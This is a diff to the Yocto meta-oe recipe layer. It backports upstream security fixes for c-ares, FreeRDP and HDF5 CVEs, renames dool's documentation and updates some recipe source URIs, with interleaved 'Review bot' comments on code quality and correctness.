++ ++static int ares__init_rand_engine(ares_rand_state *state) ++{ ++ memset(state, 0, sizeof(*state)); ++ ++#if defined(HAVE_ARC4RANDOM_BUF) || defined(_WIN32) ++ state->type = ARES_RAND_OS; ++ return 1; ++#elif defined(CARES_RANDOM_FILE) ++ state->type = ARES_RAND_FILE; ++ state->state.rand_file = fopen(CARES_RANDOM_FILE, "rb"); ++ if 
(state->state.rand_file) { ++ setvbuf(state->state.rand_file, NULL, _IONBF, 0); ++ return 1; ++ } ++ /* Fall-Thru on failure to RC4 */ ++#endif ++ ++ state->type = ARES_RAND_RC4; ++ ares_rc4_init(&state->state.rc4); ++ ++ /* Currently cannot fail */ ++ return 1; ++} ++ ++ ++ares_rand_state *ares__init_rand_state() ++{ ++ ares_rand_state *state = NULL; ++ ++ state = ares_malloc(sizeof(*state)); ++ if (!state) ++ return NULL; ++ ++ if (!ares__init_rand_engine(state)) { ++ ares_free(state); ++ return NULL; ++ } ++ ++ return state; ++} ++ ++ ++static void ares__clear_rand_state(ares_rand_state *state) ++{ ++ if (!state) ++ return; ++ ++ switch (state->type) { ++ case ARES_RAND_OS: ++ break; ++ case ARES_RAND_FILE: ++ fclose(state->state.rand_file); ++ break; ++ case ARES_RAND_RC4: ++ break; ++ } ++} ++ ++ ++static void ares__reinit_rand(ares_rand_state *state) ++{ ++ ares__clear_rand_state(state); ++ ares__init_rand_engine(state); ++} ++ ++ ++void ares__destroy_rand_state(ares_rand_state *state) ++{ ++ if (!state) ++ return; ++ ++ ares__clear_rand_state(state); ++ ares_free(state); ++} ++ ++ ++static void ares__rand_bytes(ares_rand_state *state, unsigned char *buf, size_t len) ++{ ++ ++ while (1) { ++ size_t rv; ++ size_t bytes_read = 0; ++ ++ switch (state->type) { ++ case ARES_RAND_OS: ++#ifdef _WIN32 ++ RtlGenRandom(buf, len); ++ return; ++#elif defined(HAVE_ARC4RANDOM_BUF) ++ arc4random_buf(buf, len); ++ return; ++#else ++ /* Shouldn't be possible to be here */ ++ break; ++#endif ++ ++ case ARES_RAND_FILE: ++ while (1) { ++ size_t rv = fread(buf + bytes_read, 1, len - bytes_read, state->state.rand_file); ++ if (rv == 0) ++ break; /* critical error, will reinit rand state */ ++ ++ bytes_read += rv; ++ if (bytes_read == len) ++ return; ++ } ++ break; ++ ++ case ARES_RAND_RC4: ++ ares_rc4_prng(&state->state.rc4, buf, len); ++ return; ++ } ++ ++ /* If we didn't return before we got here, that means we had a critical rand ++ * failure and need to reinitialized */ ++ 
ares__reinit_rand(state); ++ } ++} ++ ++unsigned short ares__generate_new_id(ares_rand_state *state) ++{ ++ unsigned short r=0; ++ ++ ares__rand_bytes(state, (unsigned char *)&r, sizeof(r)); ++ return r; ++} ++ +-- +2.30.2 + diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-32067.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-32067.patch new file mode 100644 index 0000000000..f6bcaee534 --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-32067.patch 
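Review bot: The RC4 fallback seed in `ares_u32_from_ptr` and `ares_rc4_generate_key` combines its inputs with bitwise OR (the high and low halves of the pointer, `tv.tv_sec | tv.tv_usec`, and the three-way `|` passed to `srand`). OR can only set bits, so it skews the seed toward ones and discards part of the little entropy the addresses and timestamp carry. XOR keeps every input bit's contribution, e.g. `return (unsigned int)((((size_t)addr >> 32) ^ (size_t)addr) & 0xFFFFFFFF);` and `data = (unsigned int)((tv.tv_sec ^ tv.tv_usec) & 0xFFFFFFFF);`. This path is reached only when `ares__init_rand_engine` has neither `HAVE_ARC4RANDOM_BUF`/`_WIN32` nor a usable `CARES_RANDOM_FILE`. For this recipe it is therefore also worth confirming from the configure output which backend the target build selects, since DNS query IDs from the fallback are only as unpredictable as that seed.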
@@ -0,0 +1,85 @@
+From b9b8413cfdb70a3f99e1573333b23052d57ec1ae Mon Sep 17 00:00:00 2001
+From: Brad House <brad@brad-house.com>
+Date: Mon, 22 May 2023 06:51:49 -0400
+Subject: [PATCH] Merge pull request from GHSA-9g78-jv2r-p7vc
+
+Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/b9b8413cfdb70a3f99e1573333b23052d57ec1ae.patch]
+CVE: CVE-2023-32067
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/lib/ares_process.c | 41 +++++++++++++++++++++++++----------------
+ 1 file changed, 25 insertions(+), 16 deletions(-)
+
+diff --git a/src/lib/ares_process.c b/src/lib/ares_process.c
+index 87329e3..605e5f8 100644
+--- a/src/lib/ares_process.c
++++ b/src/lib/ares_process.c
+@@ -457,7 +457,7 @@ static void read_udp_packets(ares_channel channel, fd_set *read_fds,
+ {
+ struct server_state *server;
+ int i;
+- ares_ssize_t count;
++ ares_ssize_t read_len;
+ unsigned char buf[MAXENDSSZ + 1];
+ #ifdef HAVE_RECVFROM
+ ares_socklen_t fromlen;
+@@ -500,32 +500,41 @@ static void read_udp_packets(ares_channel channel, fd_set *read_fds,
+ /* To reduce event loop overhead, read and process as many
+ * packets as we can. */
+ do {
+- if (server->udp_socket == ARES_SOCKET_BAD)
+- count = 0;
+-
+- else {
+- if (server->addr.family == AF_INET)
++ if (server->udp_socket == ARES_SOCKET_BAD) {
++ read_len = -1;
++ } else {
++ if (server->addr.family == AF_INET) {
+ fromlen = sizeof(from.sa4);
+- else
++ } else {
+ fromlen = sizeof(from.sa6);
+- count = socket_recvfrom(channel, server->udp_socket, (void *)buf,
+- sizeof(buf), 0, &from.sa, &fromlen);
++ }
++ read_len = socket_recvfrom(channel, server->udp_socket, (void *)buf,
++ sizeof(buf), 0, &from.sa, &fromlen);
+ }
+
+- if (count == -1 && try_again(SOCKERRNO))
++ if (read_len == 0) {
++ /* UDP is connectionless, so result code of 0 is a 0-length UDP
++ * packet, and not an indication the connection is closed like on
++ * tcp */
+ continue;
+- else if (count <= 0)
++ } else if (read_len < 0) {
++ if (try_again(SOCKERRNO))
++ continue;
++
+ handle_error(channel, i, now);
++
+ #ifdef HAVE_RECVFROM
+- else if (!same_address(&from.sa, &server->addr))
++ } else if (!same_address(&from.sa, &server->addr)) {
+ /* The address the response comes from does not match the address we
+ * sent the request to. Someone may be attempting to perform a cache
+ * poisoning attack. */
+- break;
++ continue;
+ #endif
+- else
+- process_answer(channel, buf, (int)count, i, 0, now);
+- } while (count > 0);
++
++ } else {
++ process_answer(channel, buf, (int)read_len, i, 0, now);
++ }
++ } while (read_len >= 0);
+ }
+ }
+
+--
+2.25.1
+
diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2024-25629.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2024-25629.patch
new file mode 100644
index 0000000000..4c97eda3c7
--- /dev/null
+++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2024-25629.patch
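Review bot: In the rewritten `do { … } while (read_len >= 0)` loop of read_udp_packets, the `continue` under `if (try_again(SOCKERRNO))` does not retry the read: in a do-while, `continue` jumps to the condition, and `read_len` is negative on that path, so the loop ends. The other two `continue` statements (zero-length datagram, source-address mismatch) do keep reading, so the same keyword has opposite effects a few lines apart. A comment on that branch such as `/* read_len < 0 here, so continue ends the loop */`, or writing it as `break;`, would make the intent explicit. The function body starts and ends outside the inner hunks.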
@@ -0,0 +1,34 @@ +From: a804c04ddc8245fc8adf0e92368709639125e183 Mon Sep 17 00:00:00 2001 +From: Brad House <brad@brad-house.com> +Date: Mon, 11 Mar 2024 14:29:39 +0000 +Subject: [PATCH] Merge pull request from GHSA-mg26-v6qh-x48q + +CVE: CVE-2024-25629 +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/a804c04ddc8245fc8adf0e92368709639125e183] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/lib/ares__read_line.c | 8 ++++++++ + 1 file changed, 8 insertions(+) + +diff --git a/src/lib/ares__read_line.c b/src/lib/ares__read_line.c +index c62ad2a..d6625a3 100644 +--- a/src/lib/ares__read_line.c ++++ b/src/lib/ares__read_line.c +@@ -49,6 +49,14 @@ int ares__read_line(FILE *fp, char **buf, size_t *bufsize) + if (!fgets(*buf + offset, bytestoread, fp)) + return (offset != 0) ? 0 : (ferror(fp)) ? ARES_EFILE : ARES_EOF; + len = offset + strlen(*buf + offset); ++ ++ /* Probably means there was an embedded NULL as the first character in ++ * the line, throw away line */ ++ if (len == 0) { ++ offset = 0; ++ continue; ++ } ++ + if ((*buf)[len - 1] == '\n') + { + (*buf)[len - 1] = 0; +-- +2.40.0 diff --git a/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb b/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb index 2cd00cb578..838046146f 100644 --- a/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb +++ b/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb @@ -5,7 +5,13 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.md;md5=fb997454c8d62aa6a47f07a8cd48b006" -SRC_URI = "git://github.com/c-ares/c-ares.git;branch=main;protocol=https" +SRC_URI = "git://github.com/c-ares/c-ares.git;branch=main;protocol=https \ + file://CVE-2022-4904.patch \ + file://CVE-2023-31130.patch \ + file://CVE-2023-32067.patch \ + file://CVE-2023-31147.patch \ + file://CVE-2024-25629.patch \ + " SRCREV = "2aa086f822aad5017a6f2061ef656f237a62d0ed" UPSTREAM_CHECK_GITTAGREGEX = "cares-(?P<pver>\d+_(\d_?)+)" 
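Review bot: The first line of the added CVE-2024-25629.patch is `From: a804c04ddc8245fc8adf0e92368709639125e183 Mon Sep 17 00:00:00 2001`, with a colon after `From`; the separator line that git format-patch writes has none, as in the CVE-2023-32067 patch added by this same commit (`From b9b8413…`). With the colon the header carries two `From:` fields, so a tool that reads the file as mail may take the commit hash for the author or fail to find the message start; a plain patch or quilt apply is presumably unaffected. The line should read `From a804c04ddc8245fc8adf0e92368709639125e183 Mon Sep 17 00:00:00 2001`.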
@@ -19,3 +25,7 @@ PACKAGES =+ "${PN}-utils" FILES:${PN}-utils = "${bindir}" BBCLASSEXTEND = "native nativesdk" + +# this vulneribility applies only when cross-compiling using autotools +# yocto cross-compiles via cmake which is also listed as official workaround +CVE_CHECK_IGNORE += "CVE-2023-31124" diff --git a/meta-oe/recipes-support/dool/dool/0001-Fix-rename-in-docs.patch b/meta-oe/recipes-support/dool/dool/0001-Fix-rename-in-docs.patch new file mode 100644 index 0000000000..8d576f5d58 --- /dev/null +++ b/meta-oe/recipes-support/dool/dool/0001-Fix-rename-in-docs.patch 
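Review bot: The `CVE_CHECK_IGNORE += "CVE-2023-31124"` entry is justified only by the build system in use, and nothing in this hunk ties the two together: the comment says the recipe is built with cmake, but the `inherit` line is outside the hunk, so a later switch to autotools would leave the CVE silently ignored. The comment would be more useful if it said what to re-check, for example `# CVE-2023-31124 affects autotools cross-builds only; this recipe builds with cmake. Drop this ignore if the build system changes.` The existing comment also misspells "vulnerability" as "vulneribility".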
@@ -0,0 +1,261 @@ +From 689c65fb050976d5a548a5b9a0f5d2c14eaa3301 Mon Sep 17 00:00:00 2001 +From: Alexander Stein <alexander.stein@tq-group.com> +Date: Thu, 8 Dec 2022 14:11:46 +0100 +Subject: [PATCH 1/1] Fix rename in docs + +The content of dool.1.adoc is completly unchanged from dstat.1.adoc. +Unfortunately the 'NAME' specifies the created file name. So +building/cleaning docs is currently broken + +Upstream-Status: Pending +https://github.com/scottchiefbaker/dool/pull/30 + +Signed-off-by: Alexander Stein <alexander.stein@tq-group.com> +--- + docs/dool.1.adoc | 108 +++++++++++++++++++++++------------------------ + 1 file changed, 54 insertions(+), 54 deletions(-) + +diff --git a/docs/dool.1.adoc b/docs/dool.1.adoc +index 24c4a54..921df1f 100644 +--- a/docs/dool.1.adoc ++++ b/docs/dool.1.adoc +@@ -1,35 +1,35 @@ +-= dstat(1) ++= dool(1) + Dag Wieers <dag@wieers.com> + v0.7.3, August 2014 + + + == NAME +-dstat - versatile tool for generating system resource statistics ++dool - versatile tool for generating system resource statistics + + + == SYNOPSIS +-dstat [-afv] [options..] [delay [count]] ++dool [-afv] [options..] [delay [count]] + + + == DESCRIPTION +-Dstat is a versatile replacement for vmstat, iostat and ifstat. Dstat ++Dool is a versatile replacement for vmstat, iostat and ifstat. Dool + overcomes some of the limitations and adds some extra features. + +-Dstat allows you to view all of your system resources instantly, you ++Dool allows you to view all of your system resources instantly, you + can eg. compare disk usage in combination with interrupts from your + IDE controller, or compare the network bandwidth numbers directly with + the disk throughput (in the same interval). + +-Dstat also cleverly gives you the most detailed information in columns ++Dool also cleverly gives you the most detailed information in columns + and clearly indicates in what magnitude and unit the output is displayed. + Less confusion, less mistakes, more efficient. 
+ +-Dstat is unique in letting you aggregate block device throughput for a ++Dool is unique in letting you aggregate block device throughput for a + certain diskset or network bandwidth for a group of interfaces, ie. + you can see the throughput for all the block devices that make up a + single filesystem or storage system. + +-Dstat allows its data to be directly written to a CSV file to be ++Dool allows its data to be directly written to a CSV file to be + imported and used by OpenOffice, Gnumeric or Excel to create graphs. + + [NOTE] +@@ -187,13 +187,13 @@ Possible internal stats are:: + write CSV output to file + + --profile:: +- show profiling statistics when exiting dstat ++ show profiling statistics when exiting dool + + + == PLUGINS +-While anyone can create their own dstat plugins (and contribute them) dstat ++While anyone can create their own dool plugins (and contribute them) dool + ships with a number of plugins already that extend its capabilities greatly. +-Here is an overview of the plugins dstat ships with: ++Here is an overview of the plugins dool ships with: + + --battery:: + battery in percentage (needs ACPI) +@@ -225,17 +225,17 @@ Here is an overview of the plugins dstat ships with: + --disk-wait:: + average time (in milliseconds) for I/O requests issued to the device to be served + +---dstat:: +- show dstat cputime consumption and latency ++--dool:: ++ show dool cputime consumption and latency + +---dstat-cpu:: +- show dstat advanced cpu usage ++--dool-cpu:: ++ show dool advanced cpu usage + +---dstat-ctxt:: +- show dstat context switches ++--dool-ctxt:: ++ show dool context switches + +---dstat-mem:: +- show dstat advanced memory usage ++--dool-mem:: ++ show dool advanced memory usage + + --fan:: + fan speed (needs ACPI) +@@ -250,7 +250,7 @@ Here is an overview of the plugins dstat ships with: + GPFS filesystem operations (needs mmpmon) + + --helloworld:: +- Hello world example dstat plugin ++ Hello world example dool plugin + + 
--innodb-buffer:: + show innodb buffer stats +@@ -340,22 +340,22 @@ Here is an overview of the plugins dstat ships with: + show sendmail queue size (needs sendmail) + + --snmp-cpu:: +- show CPU stats using SNMP from DSTAT_SNMPSERVER ++ show CPU stats using SNMP from DOOL_SNMPSERVER + + --snmp-load:: +- show load stats using SNMP from DSTAT_SNMPSERVER ++ show load stats using SNMP from DOOL_SNMPSERVER + + --snmp-mem:: +- show memory stats using SNMP from DSTAT_SNMPSERVER ++ show memory stats using SNMP from DOOL_SNMPSERVER + + --snmp-net:: +- show network stats using SNMP from DSTAT_SNMPSERVER ++ show network stats using SNMP from DOOL_SNMPSERVER + + --snmp-net-err: +- show network errors using SNMP from DSTAT_SNMPSERVER ++ show network errors using SNMP from DOOL_SNMPSERVER + + --snmp-sys:: +- show system stats (interrupts and context switches) using SNMP from DSTAT_SNMPSERVER ++ show system stats (interrupts and context switches) using SNMP from DOOL_SNMPSERVER + + --snooze:: + show number of ticks per second +@@ -463,7 +463,7 @@ The default delay is 1 and count is unspecified (unlimited) + + + == INTERMEDIATE UPDATES +-When invoking dstat with a *delay* greater than 1 and without the ++When invoking dool with a *delay* greater than 1 and without the + *--noupdate* option, it will show intermediate updates, ie. the first + time a 1 sec average, the second update a 2 second average, etc. until + the delay has been reached. +@@ -475,34 +475,34 @@ average on a new line, just like with vmstat. 
+ + + == EXAMPLES +-Using dstat to relate disk-throughput with network-usage (eth0), total CPU-usage and system counters: ++Using dool to relate disk-throughput with network-usage (eth0), total CPU-usage and system counters: + ---- +-dstat -dnyc -N eth0 -C total -f 5 ++dool -dnyc -N eth0 -C total -f 5 + ---- + +-Checking dstat's behaviour and the system impact of dstat: ++Checking dool's behaviour and the system impact of dool: + ---- +-dstat -taf --debug ++dool -taf --debug + ---- + + Using the time plugin together with cpu, net, disk, system, load, proc and + top_cpu plugins: + ---- +-dstat -tcndylp --top-cpu ++dool -tcndylp --top-cpu + ---- + this is identical to + ---- +-dstat --time --cpu --net --disk --sys --load --proc --top-cpu ++dool --time --cpu --net --disk --sys --load --proc --top-cpu + ---- + +-Using dstat to relate advanced cpu stats with interrupts per device: ++Using dool to relate advanced cpu stats with interrupts per device: + ---- +-dstat -t --cpu-adv -yif ++dool -t --cpu-adv -yif + ---- + + + == BUGS +-Since it is practically impossible to test dstat on every possible ++Since it is practically impossible to test dool on every possible + permutation of kernel, python or distribution version, I need your + help and your feedback to fix the remaining problems. If you have + improvements or bugreports, please send them to: +@@ -513,40 +513,40 @@ Please see the TODO file for known bugs and future plans. + + + == FILES +-Paths that may contain external dstat_*.py plugins: ++Paths that may contain external dool_*.py plugins: + +- ~/.dstat/ ++ ~/.dool/ + (path of binary)/plugins/ +- /usr/share/dstat/ +- /usr/local/share/dstat/ ++ /usr/share/dool/ ++ /usr/local/share/dool/ + + == ENVIRONMENT VARIABLES + +-Dstat will read additional command line arguments from the environment +-variable *DSTAT_OPTS*. You can use this to configure Dstat's default ++Dool will read additional command line arguments from the environment ++variable *DOOL_OPTS*. 
You can use this to configure Dool's default + behavior, e.g. if you have a black-on-white terminal: + +- export DSTAT_OPTS="--bw --noupdate" ++ export DOOL_OPTS="--bw --noupdate" + + Other internal or external plugins have their own environment variables + to influence their behavior, e.g. + + +- DSTAT_NTPSERVER ++ DOOL_NTPSERVER + +- DSTAT_MYSQL +- DSTAT_MYSQL_HOST +- DSTAT_MYSQL_PORT +- DSTAT_MYSQL_SOCKET +- DSTAT_MYSQL_USER +- DSTAT_MYSQL_PWD ++ DOOL_MYSQL ++ DOOL_MYSQL_HOST ++ DOOL_MYSQL_PORT ++ DOOL_MYSQL_SOCKET ++ DOOL_MYSQL_USER ++ DOOL_MYSQL_PWD + +- DSTAT_SNMPSERVER +- DSTAT_SNMPCOMMUNITY ++ DOOL_SNMPSERVER ++ DOOL_SNMPCOMMUNITY + +- DSTAT_SQUID_OPTS ++ DOOL_SQUID_OPTS + +- DSTAT_TIMEFMT ++ DOOL_TIMEFMT + + == SEE ALSO + +-- +2.34.1 + diff --git a/meta-oe/recipes-support/dool/dool_1.0.0.bb b/meta-oe/recipes-support/dool/dool_1.0.0.bb index d34397c12a..b70f41cb98 100644 --- a/meta-oe/recipes-support/dool/dool_1.0.0.bb +++ b/meta-oe/recipes-support/dool/dool_1.0.0.bb @@ -11,6 +11,7 @@ DEPENDS += "asciidoc-native xmlto-native" SRC_URI = "git://github.com/scottchiefbaker/dool.git;branch=master;protocol=https \ file://0001-Fix-build-error-as-following.patch \ + file://0001-Fix-rename-in-docs.patch \ " SRCREV = "34a3244b46aa70a31f871a7ca8ffa8d3a7b950d2" diff --git a/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb b/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb index 31afe78e45..b210fa6340 100644 --- a/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb +++ b/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=625f055f41728f84a8d7938acc35bdc2" DEPENDS = "zlib expat" -SRC_URI = "https://exiv2.org/releases/${BPN}-${PV}-Source.tar.gz" +SRC_URI = "https://github.com/Exiv2/${BPN}/releases/download/v${PV}/${BP}-Source.tar.gz" SRC_URI[sha256sum] = "a79f5613812aa21755d578a297874fb59a85101e793edc64ec2c6bd994e3e778" # Once patch is obsolete (project should be aware due to PRs), dos2unix can be removed either 
diff --git a/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39316.patch b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39316.patch
new file mode 100644
index 0000000000..a60b2854c8
--- /dev/null
+++ b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39316.patch
@@ -0,0 +1,53 @@
+https://github.com/FreeRDP/FreeRDP/commit/e865c24efc40ebc52e75979c94cdd4ee2c1495b0
+CVE: CVE-2022-39316
+Upstream-Status: Backport
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From e865c24efc40ebc52e75979c94cdd4ee2c1495b0 Mon Sep 17 00:00:00 2001
+From: akallabeth <akallabeth@posteo.net>
+Date: Thu, 13 Oct 2022 09:09:28 +0200
+Subject: [PATCH] Added missing length checks in zgfx_decompress_segment
+
+(cherry picked from commit 64716b335858109d14f27b51acc4c4d71a92a816)
+---
+ libfreerdp/codec/zgfx.c | 11 +++++++----
+ 1 file changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/libfreerdp/codec/zgfx.c b/libfreerdp/codec/zgfx.c
+index 20fbd354571..e260aa6e28a 100644
+--- a/libfreerdp/codec/zgfx.c
++++ b/libfreerdp/codec/zgfx.c
+@@ -230,19 +230,19 @@ static BOOL zgfx_decompress_segment(ZGFX_CONTEXT* zgfx, wStream* stream, size_t
+ BYTE* pbSegment;
+ size_t cbSegment;
+
+- if (!zgfx || !stream)
++ if (!zgfx || !stream || (segmentSize < 2))
+ return FALSE;
+
+ cbSegment = segmentSize - 1;
+
+- if ((Stream_GetRemainingLength(stream) < segmentSize) || (segmentSize < 1) ||
+- (segmentSize > UINT32_MAX))
++ if ((Stream_GetRemainingLength(stream) < segmentSize) || (segmentSize > UINT32_MAX))
+ return FALSE;
+
+ Stream_Read_UINT8(stream, flags); /* header (1 byte) */
+ zgfx->OutputCount = 0;
+ pbSegment = Stream_Pointer(stream);
+- Stream_Seek(stream, cbSegment);
++ if (!Stream_SafeSeek(stream, cbSegment))
++ return FALSE;
+
+ if (!(flags & PACKET_COMPRESSED))
+ {
+@@ -346,6 +346,9 @@ static BOOL zgfx_decompress_segment(ZGFX_CONTEXT* zgfx, wStream* stream, size_t
+ if (count > sizeof(zgfx->OutputBuffer) - zgfx->OutputCount)
+ return FALSE;
+
++ if (count > zgfx->cBitsRemaining / 8)
++ return FALSE;
++
+ CopyMemory(&(zgfx->OutputBuffer[zgfx->OutputCount]), zgfx->pbInputCurrent,
+ count);
+ zgfx_history_buffer_ring_write(zgfx, zgfx->pbInputCurrent, count);
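Review bot: The new guard `(segmentSize < 2)` at the top of zgfx_decompress_segment has no comment explaining the constant. From the visible lines it keeps `cbSegment = segmentSize - 1` at 1 or more, that is, the 1-byte header read by `Stream_Read_UINT8` plus at least one further byte, and it replaces the old `segmentSize < 1` test that ran only after the subtraction. A one-line comment above the check such as `/* 1-byte header plus at least one payload byte */` would record that. The function continues outside both inner hunks, so how the remaining bytes are consumed is not visible here.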
diff --git a/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39318-39319.patch b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39318-39319.patch
new file mode 100644
index 0000000000..76a9e00dd3
--- /dev/null
+++ b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39318-39319.patch
@@ -0,0 +1,41 @@
+https://github.com/FreeRDP/FreeRDP/commit/80adde17ddc4b596ed1dae0922a0c54ab3d4b8ea
+CVE: CVE-2022-39318 CVE-2022-39319
+Upstream-Status: Backport
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 80adde17ddc4b596ed1dae0922a0c54ab3d4b8ea Mon Sep 17 00:00:00 2001
+From: akallabeth <akallabeth@posteo.net>
+Date: Thu, 13 Oct 2022 08:27:41 +0200
+Subject: [PATCH] Fixed division by zero in urbdrc
+
+(cherry picked from commit 731f8419d04b481d7160de1f34062d630ed48765)
+---
+ channels/urbdrc/client/libusb/libusb_udevice.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/channels/urbdrc/client/libusb/libusb_udevice.c b/channels/urbdrc/client/libusb/libusb_udevice.c
+index 505c31d7b55..ef87f195f38 100644
+--- a/channels/urbdrc/client/libusb/libusb_udevice.c
++++ b/channels/urbdrc/client/libusb/libusb_udevice.c
+@@ -1221,12 +1221,18 @@ static int libusb_udev_isoch_transfer(IUDEVICE* idev, URBDRC_CHANNEL_CALLBACK* c
+ if (!Buffer)
+ Stream_Seek(user_data->data, (NumberOfPackets * 12));
+
+- iso_packet_size = BufferSize / NumberOfPackets;
+- iso_transfer = libusb_alloc_transfer(NumberOfPackets);
++ if (NumberOfPackets > 0)
++ {
++ iso_packet_size = BufferSize / NumberOfPackets;
++ iso_transfer = libusb_alloc_transfer((int)NumberOfPackets);
++ }
+
+ if (iso_transfer == NULL)
+ {
+- WLog_Print(urbdrc->log, WLOG_ERROR, "Error: libusb_alloc_transfer.");
++ WLog_Print(urbdrc->log, WLOG_ERROR,
++ "Error: libusb_alloc_transfer [NumberOfPackets=%" PRIu32 ", BufferSize=%" PRIu32
++ " ]",
++ NumberOfPackets, BufferSize);
+ async_transfer_user_data_free(user_data);
+ return -1;
+ }
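Review bot: The added `libusb_alloc_transfer((int)NumberOfPackets)` narrows a value that the new log line prints with `PRIu32`, and the guard in front of it only excludes zero. If NumberOfPackets is a 32-bit unsigned taken from the peer's request (its declaration is outside the hunk), values above INT_MAX turn negative in the cast; an upper bound belongs in the same condition, e.g. `if ((NumberOfPackets > 0) && (NumberOfPackets <= INT_MAX))`. The zero case also now relies on `iso_transfer` already being NULL when `if (iso_transfer == NULL)` runs, and that initialisation is not visible here, so it is worth confirming in the full function.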
diff --git a/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb b/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb index ece2f56960..9da8b27c0d 100644 --- a/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb +++ b/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb @@ -16,6 +16,8 @@ PKGV = "${GITPKGVTAG}" SRCREV = "658a72980f6e93241d927c46cfa664bf2547b8b1" SRC_URI = "git://github.com/FreeRDP/FreeRDP.git;branch=stable-2.0;protocol=https \ file://winpr-makecert-Build-with-install-RPATH.patch \ + file://CVE-2022-39316.patch \ + file://CVE-2022-39318-39319.patch \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/glog/glog_0.5.0.bb b/meta-oe/recipes-support/glog/glog_0.5.0.bb index 61581d96d7..f0b1293965 100644 --- a/meta-oe/recipes-support/glog/glog_0.5.0.bb +++ b/meta-oe/recipes-support/glog/glog_0.5.0.bb @@ -7,7 +7,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=dc9db360e0bbd4e46672f3fd91dd6c4b" SRC_URI = " \ - git://github.com/google/glog.git;nobranch=1;protocol=https \ + git://github.com/google/glog.git;branch=master;protocol=https \ file://libexecinfo.patch \ " diff --git a/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb b/meta-oe/recipes-support/gnulib/gnulib_2018-12-18.bb index a27968079e..a27968079e 100644 --- a/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb +++ b/meta-oe/recipes-support/gnulib/gnulib_2018-12-18.bb diff --git a/meta-oe/recipes-support/hdf5/files/CVE-2021-37501.patch b/meta-oe/recipes-support/hdf5/files/CVE-2021-37501.patch new file mode 100644 index 0000000000..01099f3438 --- /dev/null +++ b/meta-oe/recipes-support/hdf5/files/CVE-2021-37501.patch 
@@ -0,0 +1,37 @@
+From 602015eacc53bf2699bf4c4e5420b63c3f067547 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Mon, 11 Sep 2023 14:01:37 +0800
+Subject: [PATCH] Check for overflow when calculating on-disk attribute data
+ size
+
+Bogus sizes in this test case causes the on-disk data size
+calculation in H5O_attr_decode() to overflow so that the
+calculated size becomes 0. This causes the read to overflow
+and h5dump to segfault.
+
+CVE: CVE-2021-37501
+
+Upstream-Status: Backport [https://github.com/HDFGroup/hdf5/commit/b16ec83d4bd79f9ffaad85de16056419f3532887]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ src/H5Oattr.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/H5Oattr.c b/src/H5Oattr.c
+index c2c0fe3..c289344 100644
+--- a/src/H5Oattr.c
++++ b/src/H5Oattr.c
+@@ -217,6 +217,9 @@ H5O_attr_decode(H5F_t *f, hid_t dxpl_id, H5O_t *open_oh, unsigned H5_ATTR_UNUSED
+
+ /* Compute the size of the data */
+ H5_CHECKED_ASSIGN(attr->shared->data_size, size_t, H5S_GET_EXTENT_NPOINTS(attr->shared->ds) * H5T_get_size(attr->shared->dt), hsize_t);
++ /* Check if multiplication has overflown */
++ if ((attr->shared->data_size / H5T_get_size(attr->shared->dt)) != H5S_GET_EXTENT_NPOINTS(attr->shared->ds))
++ HGOTO_ERROR(H5E_RESOURCE, H5E_OVERFLOW, NULL, "data size exceeds addressable range");
+
+ /* Go get the data */
+ if(attr->shared->data_size) {
+--
+2.25.1
+
diff --git a/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb b/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb
index 7b886a4635..4110e9cea4 100644
--- a/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb
+++ b/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb
